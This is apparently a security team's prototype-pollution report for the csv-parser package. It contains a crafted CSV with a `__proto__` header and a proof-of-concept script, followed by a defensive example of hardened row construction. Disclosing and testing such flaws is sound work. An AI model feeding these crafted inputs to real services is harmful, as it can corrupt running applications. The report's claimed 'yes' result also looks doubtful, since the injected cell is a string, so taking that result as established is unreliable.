Hi, we are a security team. We found a Prototype Pollution vulnerability in your project.
- Operating System: All
- Node Version: All LTS versions
- NPM Version: All
- csv-parser Version: All versions
Expected Behavior
- CSV headers containing special keys like `__proto__` or `constructor` should be treated as ordinary string property names (not prototype chain modifiers).
- Parsing CSV files should not modify the prototype of `Row` instances or the global `Object.prototype`.
- Object property assignment during parsing should be safe and not cause prototype pollution.
Actual Behavior
- When parsing CSV files with `__proto__`/`constructor` as headers, the `_compile()` method dynamically generates `Row` constructor code that directly uses unfiltered header names.
- Assignment statements like `this["__proto__"] = cells[1]` modify the prototype chain of the `Row` instance, leading to global `Object.prototype` pollution.
- Arbitrary properties (e.g., `polluted: "yes"`) are injected into the global prototype, causing unexpected behavior (e.g., unauthorized property inheritance, broken `instanceof` checks).
- The `constructor` header injection overwrites the constructor reference of `Row` instances, corrupting prototype inheritance logic.
How Do We Reproduce?
1. Install csv-parser (any version):
2. Create a malicious CSV file named malicious.csv:
```csv
name,__proto__,value
device1,{"polluted":"yes"},100
```
3. Create a test script poc.js:
```javascript
const fs = require('fs');
const csv = require('csv-parser');

// Check initial state (should be undefined)
console.log('Before parsing:', Object.prototype.polluted);

// Parse the malicious CSV file
fs.createReadStream('malicious.csv')
  .pipe(csv())
  .on('data', (row) => {
    console.log('Parsed row data:', row);
  })
  .on('end', () => {
    // Verify prototype pollution (vulnerable versions return "yes")
    console.log('After parsing:', Object.prototype.polluted);
  });
```
4. Run the script:
5. Observe the output:
Expected: Before parsing: undefined / After parsing: undefined
Actual (vulnerable): Before parsing: undefined / After parsing: yes
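
The expected behaviour listed in the report (header names stored as ordinary property names) can be shown in isolation. This is an added example, not code from csv-parser or from the report; `naiveRow`, `safeRow` and `findReservedHeaders` are hypothetical helpers, and the sample row is constructed to mirror malicious.csv.

```javascript
'use strict';
// Added example: not csv-parser code. All helper names are hypothetical.

// Header names that collide with prototype-chain machinery.
const RESERVED = new Set(['__proto__', 'constructor', 'prototype']);

// Naive pattern: header names are assigned as keys on an ordinary object,
// so "__proto__" goes through the accessor inherited from Object.prototype.
function naiveRow(headers, cells) {
  const row = {};
  headers.forEach((h, i) => { row[h] = cells[i]; });
  return row;
}

// Hardened pattern: the row has no prototype and every column is defined as
// an own data property, so any header name is stored as plain data.
function safeRow(headers, cells) {
  const row = Object.create(null);
  headers.forEach((h, i) => {
    Object.defineProperty(row, h, {
      value: cells[i], enumerable: true, writable: true, configurable: true,
    });
  });
  return row;
}

// Stricter policy: report reserved header names so the caller can reject the file.
function findReservedHeaders(headers) {
  return headers.filter((h) => RESERVED.has(h.trim()));
}

// Constructed sample mirroring malicious.csv from the report.
const HEADERS = ['name', '__proto__', 'value'];
const CELLS = ['device1', '{"polluted":"yes"}', '100'];

function demo() {
  const naive = naiveRow(HEADERS, CELLS);
  const safe = safeRow(HEADERS, CELLS);
  return {
    naiveKeys: Object.keys(naive),       // own columns on the ordinary object
    safeKeys: Object.keys(safe),         // own columns on the null-prototype row
    safeProtoCell: safe['__proto__'],    // cell stored under the "__proto__" header
    globalPolluted: ({}).polluted,       // what a fresh object inherits afterwards
    reserved: findReservedHeaders(HEADERS),
  };
}

console.log(demo());
```

With this sample, the naive row ends up without a `__proto__` column in `Object.keys`, while the hardened row keeps all three columns as data. A regression test for a parser can assert the same properties on parsed rows.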